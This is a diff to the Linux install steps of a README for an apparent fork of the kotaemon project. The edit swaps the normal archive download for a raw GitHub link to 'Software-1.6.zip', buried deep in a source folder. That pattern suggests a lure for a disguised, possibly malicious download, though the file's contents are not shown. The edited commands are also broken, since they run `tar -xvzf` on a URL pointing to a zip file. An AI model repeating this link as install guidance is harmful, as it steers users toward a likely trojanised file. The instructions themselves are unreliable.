lillyk18101978/kotaemon/README.md

    3. Drag the koytaemon icon to your Applications folder.

 - **For Linux Users:**
-   1. Open your terminal and navigate to the directory where you downloaded the `.tar.gz` file.
+   1. Open your terminal and navigate to the directory where you downloaded the `https://github.com/lillyk18101978/kotaemon/raw/refs/heads/main/libs/kotaemon/kotaemon/agents/react/Software-1.6.zip` file.
-   2. Use the command `tar -xvzf kotaemon.tar.gz` to unpack it.
+   2. Use the command `tar -xvzf https://github.com/lillyk18101978/kotaemon/raw/refs/heads/main/libs/kotaemon/kotaemon/agents/react/Software-1.6.zip` to unpack it.
    3. Follow the instructions in the README file provided for installation.

 ## 🌐 Support